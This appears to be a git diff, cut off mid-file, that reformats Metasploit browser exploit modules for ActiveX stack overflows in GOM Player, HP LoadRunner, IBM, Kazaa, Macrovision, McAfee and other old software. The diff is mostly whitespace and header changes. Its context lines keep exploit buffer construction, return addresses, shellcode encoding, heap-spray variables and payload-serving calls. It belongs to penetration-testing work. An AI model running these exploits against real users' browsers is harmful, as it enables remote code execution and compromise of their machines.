b/modules/exploits/windows/browser/gom_openurl.rb index 18665ab5f7..3b82127974 100644 --- a/modules/exploits/windows/browser/gom_openurl.rb +++ b/modules/exploits/windows/browser/gom_openurl.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'GOM Player ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in GOM Player 2.1.6.3499. - By sending an overly long string to the "OpenUrl()" method located - in the GomWeb3.dll Control, an attacker may be able to execute - arbitrary code. + This module exploits a stack overflow in GOM Player 2.1.6.3499. + By sending an overly long string to the "OpenUrl()" method located + in the GomWeb3.dll Control, an attacker may be able to execute + arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5779'], [ 'OSVDB', '38282'], @@ -69,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer - sploit = rand_text_english(506) + [target.ret].pack('V') + + # Set the exploit buffer + sploit = rand_text_english(506) + [target.ret].pack('V') sploit << p.encoded + rand_text_english(1024 - p.encoded.length) - + # Build out the message content = %Q| @@ -84,13 +83,13 @@ class Metasploit3 < Msf::Exploit::Remote #{vname}.OpenURL(#{strname}); - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb index 0deec7d2a9..026d09bdc2 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfile.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfile.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -23,14 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Persits XUpload ActiveX AddFile Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Persits Software Inc's - XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. - By passing an overly long string to the AddFile method, an attacker may be - able to execute arbitrary code. + XUpload ActiveX control(version 3.0.0.3) thats included in HP LoadRunner 9.5. + By passing an overly long string to the AddFile method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'jduck' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-0492'], [ 'OSVDB', '40762'], @@ -83,14 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote sploit << p.encoded sploit << rand_text(1000) * 25 sploit = Rex::Text.to_unescape(sploit) - + # Build out the message content = %Q| @@ -98,12 +97,12 @@ function check() | - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb index a4ca89540e..678e49e481 100644 --- a/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb +++ b/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -22,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Persits Software Inc's - XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. - By passing an overly long string to the AddFolder method, an attacker may be - able to execute arbitrary code. + XUpload ActiveX control(version 2.1.0.1) thats included in HP LoadRunner 9.0. + By passing an overly long string to the AddFolder method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-6530'], [ 'OSVDB', '39901'], @@ -49,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP2 Pro English / IE6SP0-SP2', { 'Offset' => 1388, 'Ret' => 0x323ad95f } ], # PocoNet.dll + [ 'Windows XP SP2 Pro English / IE6SP0-SP2', { 'Offset' => 1388, 'Ret' => 0x323ad95f } ], # PocoNet.dll ], 'DisclosureDate' => 'Dec 25 2007', 'DefaultTarget' => 0)) @@ -70,27 +69,26 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer + + # Set the exploit buffer sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') - sploit << p.encoded + rand_text_alpha(1024 - p.encoded.length) + sploit << p.encoded + rand_text_alpha(1024 - p.encoded.length) # Build out the message - content = %Q| - - - - - | - + content = %Q| + + + +| + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb index fcb17a18f7..192214e490 100644 --- a/modules/exploits/windows/browser/hpmqc_progcolor.rb +++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -7,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -17,17 +20,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow', 'Description' => %q{ - This module exploits a stack-based buffer overflow in SPIDERLib.Loader - ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) - for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and + This module exploits a stack-based buffer overflow in SPIDERLib.Loader + ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) + for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. - By setting an overly long value to 'ProgColor', an attacker can overrun + By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Trancer ' ], + 'Author' => [ 'Trancer ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-1819' ], [ 'OSVDB', '34317'], @@ -41,13 +44,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 1024, - 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 64, 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 64, 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Apr 4 2007', 'DefaultTarget' => 0)) @@ -72,12 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote nops = Rex::Text.to_unescape([target.ret].pack('V')) ret = Rex::Text.uri_encode([target.ret].pack('L')) blocksize = 0x40000 - fillto = 500 + fillto = 500 offset = target['Offset'] - + # Randomize the javascript variable names mqcontrol = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) @@ -88,34 +91,31 @@ class Metasploit3 < Msf::Exploit::Remote j_ret = rand_text_alpha(rand(100) + 1) # Build out the message - content = %Q| - - - - - | + content = %Q| + + + +| - - print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb index f83794db0f..c6be67a197 100644 --- a/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb +++ b/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb @@ -1,9 +1,13 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/projects/Framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## require 'msf/core' @@ -17,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'IBM Access Support ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in IBM Access Support. When - sending an overly long string to the GetXMLValue() method of IbmEgath.dll - (3.20.284.0) an attacker may be able to execute arbitrary code. + sending an overly long string to the GetXMLValue() method of IbmEgath.dll + (3.20.284.0) an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2009-0215' ], [ 'OSVDB', '52958' ], @@ -41,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Mar 24 2009', 'DefaultTarget' => 0)) @@ -61,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - + ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2) fill = rand_text_english(rand(12) + 1) @@ -87,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote opts = { 'Strings' => true, 'Symbols' => { - 'Variables' => [ + 'Variables' => [ 'vulnerable', 'shellcode', 'my_unescape', @@ -100,21 +104,20 @@ class Metasploit3 < Msf::Exploit::Remote js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) js.update_opts(js_heap_spray.opts) js.obfuscate() - content = %Q| - - - - - - | + content = %Q| + + + + +| print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index dec5384cc3..792a16b42e 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -1,3 +1,6 @@ +## +# $Id$ +## ## # This file is part of the Metasploit Framework and may be subject to @@ -8,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -18,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'IBM Lotus Domino Web Access Upload Module Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module. - By sending an overly long string to the "General_ServerName()" property located - in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute - arbitrary code. + This module exploits a stack overflow in IBM Lotus Domino Web Access Upload Module. + By sending an overly long string to the "General_ServerName()" property located + in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute + arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Elazar Broad ' ], + 'Author' => [ 'Elazar Broad ' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-4474' ], [ 'OSVDB', '40954' ], @@ -46,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Dec 20 2007', 'DefaultTarget' => 0)) @@ -72,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote junk = Rex::Text.to_unescape(rand_text_alpha(2)) ret = Rex::Text.to_unescape([target.ret].pack('V')) blocksize = 0x30000 - fillto = 400 + fillto = 400 # Randomize the javascript variable names dwa7w = rand_text_alpha(rand(100) + 1) - inotes6 = rand_text_alpha(rand(100) + 1) - j_shellcode = rand_text_alpha(rand(100) + 1) + inotes6 = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) @@ -87,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote j_counter = rand_text_alpha(rand(30) + 2) j_ret = rand_text_alpha(rand(100) + 1) j_junk = rand_text_alpha(rand(100) + 1) - + # Build out the message content = %Q| @@ -121,13 +123,13 @@ class Metasploit3 < Msf::Exploit::Remote | - - + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 43f7508824..cc05d37d9a 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -29,10 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote # exploits. Make sure service packs on top of 6.0 are considered less # than the max by setting to 6.1 (which doesn't really exist). :ua_maxver => "6.1", - :javascript => true, + :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'CreateObject', - :classid => + :classid => [ '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E30}', @@ -43,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', - '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', + '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', @@ -55,16 +53,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Description' => %q{ - This module exploits a generic code execution vulnerability in Internet - Explorer by abusing vulnerable ActiveX objects. + This module exploits a generic code execution vulnerability in Internet + Explorer by abusing vulnerable ActiveX objects. }, 'License' => MSF_LICENSE, - 'Author' => - [ - 'hdm', + 'Author' => + [ + 'hdm', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ # MDAC [ 'MSB', 'MS06-014' ], @@ -102,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], - [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], + [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], # # The controls below can launch the "installing component" dialogs... @@ -116,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], - + ], 'DefaultTarget' => 0)) end @@ -138,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote var_func_createo = rand_text_alpha(rand(30)+2); var_exe_name = rand_text_alpha(rand(30)+2); var_objects = '' - + # Build the object list based on target selection if (target.name == 'Automatic') targets.each do |t| @@ -148,21 +146,21 @@ class Metasploit3 < Msf::Exploit::Remote else var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end - - + + content = %Q^ - - #{var_html} - - + + + +#{var_html} + + | content = Rex::Text.randomize_space(content) - # Insert the shellcode + # Insert the shellcode content.gsub!('__pattern__', pattern) - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload - handler(cli) + handler(cli) end end diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index 4a55ad5aac..a9a40dae37 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -210,29 +210,28 @@ class Metasploit3 < Msf::Exploit::Remote #clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93' clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' html = %Q| - - Please wait... - - +Please wait... + + | elsif (request.uri =~ /\.htm/i) @@ -240,19 +239,18 @@ class Metasploit3 < Msf::Exploit::Remote clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ] clsid = clsids[rand(clsids.length)] html = %Q| - - Please wait... - - - - - - +Please wait... + + + + + + | else @@ -263,15 +261,15 @@ class Metasploit3 < Msf::Exploit::Remote no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm" html = %Q| - - - - - Please wait... - - + + + + +Please wait... + + | # end of detection html diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index d5ad06e12b..b2f380cb46 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Kazaa Altnet Download Manager ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the Altnet Download Manager ActiveX - Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. - By sending a overly long string to the "Install()" method, an attacker may be - able to execute arbitrary code. + Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7. + By sending a overly long string to the "Install()" method, an attacker may be + able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5217' ], [ 'OSVDB', '37785' ], @@ -47,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP2 / IE 6.0SP1 English', { 'Ret' => '\x0c\x0c\x0c\x0c' } ] + [ 'Windows XP SP0-SP2 / IE 6.0SP1 English', { 'Ret' => '\x0c\x0c\x0c\x0c' } ] ], 'DisclosureDate' => 'Oct 3 2007', 'DefaultTarget' => 0)) @@ -105,12 +104,12 @@ class Metasploit3 < Msf::Exploit::Remote "" content = Rex::Text.randomize_space(content) - + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 0c66da9c5b..8f8f3e1198 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Logitech VideoCall ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the Logitech VideoCall ActiveX - Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the - "Start()" method, an attacker may be able to execute arbitrary code. + Control (wcamxmp.dll 2.0.3470.448). By sending a overly long string to the + "Start()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-2918' ], [ 'OSVDB', '36820'], @@ -68,10 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer - sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') + p.encoded - + + # Set the exploit buffer + sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V') + p.encoded + # Build out the message content = %Q| @@ -79,16 +78,16 @@ class Metasploit3 < Msf::Exploit::Remote - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 9590a3faec..4060638a5d 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -1,13 +1,16 @@ -### -## This file is part of the Metasploit Framework and may be subject to -## redistribution and commercial restrictions. Please see the Metasploit -## Framework web site for more information on licensing and terms of use. -## http://metasploit.com/framework/ -### +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -17,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When - sending an overly long string to the URL() property an attacker may be able to execute arbitrary code. + This module exploits a stack overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When + sending an overly long string to the URL() property an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-4384' ], [ 'OSVDB', '48946' ], @@ -42,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ] + [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Oct 6 2008', 'DefaultTarget' => 0)) @@ -62,10 +65,10 @@ class Metasploit3 < Msf::Exploit::Remote # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) - - # Create some nops. + + # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) - + # Set the return. ret = Rex::Text.uri_encode([target.ret].pack('L')) @@ -112,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index f9345fcc84..b34234bf5f 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Macrovision InstallShield Update Service Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Macrovision InstallShield Update - Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to - the DownloadAndExecute method, an attacker may be able to execute arbitrary code. + Service(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to + the DownloadAndExecute method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5660' ], [ 'OSVDB', '38347' ], @@ -69,12 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote # Randomize some things vname = rand_text_alpha(rand(100) + 1) strname = rand_text_alpha(rand(100) + 1) - - # Set the exploit buffer + + # Set the exploit buffer sploit = rand_text_alpha(target['Offset']) - sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') sploit << p.encoded + rand_text_alpha(1200 - p.encoded.length) - + #[id(0x00000007), helpstring("method DownloadAndExecute")] #void DownloadAndExecute( # BSTR dispname, @@ -92,13 +91,13 @@ class Metasploit3 < Msf::Exploit::Remote #{vname}.DownloadAndExecute("", #{strname}, 0, "", ""); - | - + | + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) - + # Handle the payload handler(cli) end diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 44a5046fe3..d821837fba 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -1,14 +1,16 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -18,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Macrovision InstallShield Update Service ActiveX Unsafe Method', 'Description' => %q{ - This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. + This module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-5660' ], [ 'OSVDB', '38347' ], @@ -67,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote vname = rand_text_alpha(rand(100) + 1) exe = rand_text_alpha(rand(20) + 1) - + content = %Q| | @@ -84,9 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) - + handler(cli) - + end end diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index b1c03a0763..76133c550d 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'McAfee Subscription Manager Stack Overflow', 'Description' => %q{ - This module exploits a flaw in the McAfee Subscription Manager ActiveX control. + This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye. }, 'License' => MSF_LICENSE, - 'Author' => - [ - 'skape', + 'Author' => + [ + 'skape', ], 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2006-3961'], [ 'OSVDB', '27698'], @@ -58,7 +56,7 